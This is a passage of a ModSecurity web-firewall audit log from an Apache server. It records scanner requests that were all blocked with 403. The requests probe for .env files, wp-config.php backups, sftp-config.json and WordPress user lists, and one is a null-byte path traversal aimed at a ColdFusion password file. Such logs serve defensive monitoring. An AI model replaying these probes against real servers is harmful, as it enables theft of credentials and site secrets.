[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||103.236.140.4|F|3"] [data "ARGS:locale=..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5c..\x5cJRun4\x5cservers\x5ccfusion\x5ccfusion-ear\x5ccfusion-war\x5cWEB-INF\x5ccfusion\x5clib\x5cpassword.properties\x00en"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749403998728253 2517 (- - -) Stopwatch2: 1749403998728253 2517; combined=983, p1=461, p2=492, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --550aad63-Z-- --652c8208-A-- [09/Jun/2025:00:45:03 +0700] aEXMH8CyjFxjzV1Pwa07sAAAABI 103.236.140.4 44724 103.236.140.4 8181 --652c8208-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.172.158.128 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.172.158.128 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --652c8208-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --652c8208-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749404703889606 918 (- - -) Stopwatch2: 1749404703889606 918; combined=345, p1=287, p2=0, p3=0, p4=0, p5=58, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --652c8208-Z-- --08df723e-A-- [09/Jun/2025:00:48:20 +0700] aEXM5MCyjFxjzV1Pwa07tgAAAA4 103.236.140.4 44746 103.236.140.4 8181 --08df723e-B-- GET /www/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: POLARIS/6.01(BREW 3.1.5;U;en-us;LG;LX265;POLARIS/6.01/WAP;)MMP/2.0 profile/MIDP-201 Configuration /CLDC-1.1 Accept-Charset: utf-8 --08df723e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08df723e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749404900439242 851 (- - -) Stopwatch2: 1749404900439242 851; combined=337, p1=298, p2=0, p3=0, p4=0, p5=38, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08df723e-Z-- --9d89fb62-A-- [09/Jun/2025:02:51:18 +0700] aEXptse0OZpePEzoRnp0kgAAAFc 103.236.140.4 48486 103.236.140.4 8181 --9d89fb62-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --9d89fb62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d89fb62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412278120943 1120 (- - -) Stopwatch2: 1749412278120943 1120; combined=325, p1=280, p2=0, p3=0, p4=0, p5=44, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d89fb62-Z-- --6feec250-A-- [09/Jun/2025:02:51:36 +0700] aEXpyIsoVckF-yt1MVz5LwAAAMo 103.236.140.4 48880 103.236.140.4 8181 --6feec250-B-- GET /wp-config.php.bak HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --6feec250-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6feec250-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412296260024 1312 (- - -) Stopwatch2: 1749412296260024 1312; combined=423, p1=369, p2=0, p3=0, p4=0, p5=54, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6feec250-Z-- --c8baf95a-A-- [09/Jun/2025:02:51:42 +0700] aEXpzsCyjFxjzV1Pwa1bIAAAAA8 103.236.140.4 49030 103.236.140.4 8181 --c8baf95a-B-- GET /wp-config.php~ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --c8baf95a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c8baf95a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412302359708 951 (- - -) Stopwatch2: 1749412302359708 951; combined=333, p1=292, p2=0, p3=0, p4=0, p5=40, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c8baf95a-Z-- --3e7bd142-A-- [09/Jun/2025:02:52:18 +0700] aEXp8qD1_iznf-QmBEC0nQAAAI8 103.236.140.4 49862 103.236.140.4 8181 --3e7bd142-B-- GET /sftp-config.json HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.212.206.141 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.212.206.141 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-I545 4G Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36 Accept: */* --3e7bd142-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3e7bd142-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/sftp-config.json" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412338402316 1490 (- - -) Stopwatch2: 1749412338402316 1490; combined=606, p1=548, p2=0, p3=0, p4=0, p5=58, sr=132, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3e7bd142-Z-- --471cb74b-A-- [09/Jun/2025:02:54:10 +0700] aEXqYsCyjFxjzV1Pwa1cOQAAABM 103.236.140.4 52562 103.236.140.4 8181 --471cb74b-B-- GET /public/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Accept-Charset: utf-8 --471cb74b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --471cb74b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412450952862 774 (- - -) Stopwatch2: 1749412450952862 774; combined=318, p1=276, p2=0, p3=0, p4=0, p5=42, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --471cb74b-Z-- --bf45230e-A-- [09/Jun/2025:02:55:25 +0700] aEXqrce0OZpePEzoRnp1vQAAAE0 103.236.140.4 54318 103.236.140.4 8181 --bf45230e-B-- GET /core/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 173.249.58.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 173.249.58.161 X-Forwarded-Proto: http Connection: close User-Agent: NokiaN73-1/3.0649.0.0.1 Series60/3.0 Profile/MIDP2.0 Configuration/CLDC-1.1 Accept-Charset: utf-8 --bf45230e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf45230e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749412525452389 933 (- - -) Stopwatch2: 1749412525452389 933; combined=337, p1=289, p2=0, p3=0, p4=0, p5=48, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf45230e-Z-- --7a2eee3f-A-- [09/Jun/2025:03:04:47 +0700] aEXs36D1_iznf-QmBEC5QQAAAJA 103.236.140.4 60628 103.236.140.4 8181 --7a2eee3f-B-- GET /wp-includes/css/wp-config.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 13.228.78.28 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 13.228.78.28 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: */* --7a2eee3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a2eee3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749413087235710 28290 (- - -) Stopwatch2: 1749413087235710 28290; combined=55401, p1=226, p2=0, p3=0, p4=0, p5=27604, sr=65, sw=0, l=0, gc=27571 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a2eee3f-Z-- --41f40620-A-- [09/Jun/2025:03:31:32 +0700] aEXzJIsoVckF-yt1MVz7LQAAAMI 103.236.140.4 60982 103.236.140.4 8181 --41f40620-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36 Accept-Charset: utf-8 --41f40620-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --41f40620-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749414692246756 859 (- - -) Stopwatch2: 1749414692246756 859; combined=325, p1=285, p2=0, p3=0, p4=0, p5=40, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --41f40620-Z-- --ed297311-A-- [09/Jun/2025:03:59:01 +0700] aEX5lU2r5gN9oSasJQzVXAAAAMY 103.236.140.4 33166 103.236.140.4 8181 --ed297311-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.142.194.42 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.142.194.42 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (compatible; Yahoo! 
Slurp China; http://misc.yahoo.com.cn/help.html) Accept-Charset: utf-8 --ed297311-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed297311-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749416341853832 1203 (- - -) Stopwatch2: 1749416341853832 1203; combined=534, p1=496, p2=0, p3=0, p4=0, p5=38, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed297311-Z-- --06811363-A-- [09/Jun/2025:04:01:25 +0700] aEX6Ja6OGK25CtJ36rMf9wAAAAk 103.236.140.4 33188 103.236.140.4 8181 --06811363-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.68.62.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.68.62.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --06811363-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --06811363-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749416485239503 3687 (- - -) Stopwatch2: 1749416485239503 3687; combined=1506, p1=513, p2=956, p3=0, p4=0, p5=36, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --06811363-Z-- --d9990b6e-A-- [09/Jun/2025:05:01:15 +0700] aEYIKxMDIkuu7kMwm-AtqAAAAI0 103.236.140.4 33704 103.236.140.4 8181 --d9990b6e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 115.79.217.131 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 115.79.217.131 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9990b6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9990b6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749420075771680 3648 (- - -) Stopwatch2: 1749420075771680 3648; combined=1544, p1=528, p2=984, p3=0, p4=0, p5=32, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9990b6e-Z-- --23331f0f-A-- [09/Jun/2025:05:03:05 +0700] aEYImWIgvuFVSPOFHr84nAAAAEA 103.236.140.4 33714 103.236.140.4 8181 --23331f0f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 70.39.90.111 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 70.39.90.111 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --23331f0f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23331f0f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749420185580803 888 (- - -) Stopwatch2: 1749420185580803 888; combined=339, p1=296, p2=0, p3=0, p4=0, p5=43, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23331f0f-Z-- --d56ec577-A-- [09/Jun/2025:05:07:11 +0700] aEYJjxMDIkuu7kMwm-AtsAAAAIE 103.236.140.4 33826 103.236.140.4 8181 --d56ec577-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 206.189.225.181 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 206.189.225.181 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --d56ec577-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d56ec577-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749420431213869 702 (- - -) Stopwatch2: 1749420431213869 702; combined=271, p1=238, p2=0, p3=0, p4=0, p5=32, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d56ec577-Z-- --d982f302-A-- [09/Jun/2025:05:54:47 +0700] aEYUtxMDIkuu7kMwm-At7QAAAIQ 103.236.140.4 34242 103.236.140.4 8181 --d982f302-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.163 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.163 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3833.99 Safari/537.36 Accept-Charset: utf-8 --d982f302-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d982f302-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749423287113947 850 (- - -) Stopwatch2: 1749423287113947 850; combined=404, p1=365, p2=0, p3=0, p4=0, p5=38, sr=156, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d982f302-Z-- --75c5a621-A-- [09/Jun/2025:05:56:02 +0700] aEYVAhMDIkuu7kMwm-At8wAAAI0 103.236.140.4 34282 103.236.140.4 8181 --75c5a621-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.70.28 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.70.28 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/4.0 (compatible; Dillo 3.0) Accept-Charset: utf-8 --75c5a621-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75c5a621-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749423362686740 925 (- - -) Stopwatch2: 1749423362686740 925; combined=397, p1=341, p2=0, p3=0, p4=0, p5=55, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75c5a621-Z-- --c85cbb5c-A-- [09/Jun/2025:06:15:11 +0700] aEYZfxMDIkuu7kMwm-At-wAAAIA 103.236.140.4 34384 103.236.140.4 8181 --c85cbb5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 34.86.47.169 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 34.86.47.169 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; LYA-L29 Build/HUAWEILYA-L29; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --c85cbb5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c85cbb5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749424511719671 861 (- - -) Stopwatch2: 1749424511719671 861; combined=324, p1=283, p2=0, p3=0, p4=0, p5=41, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
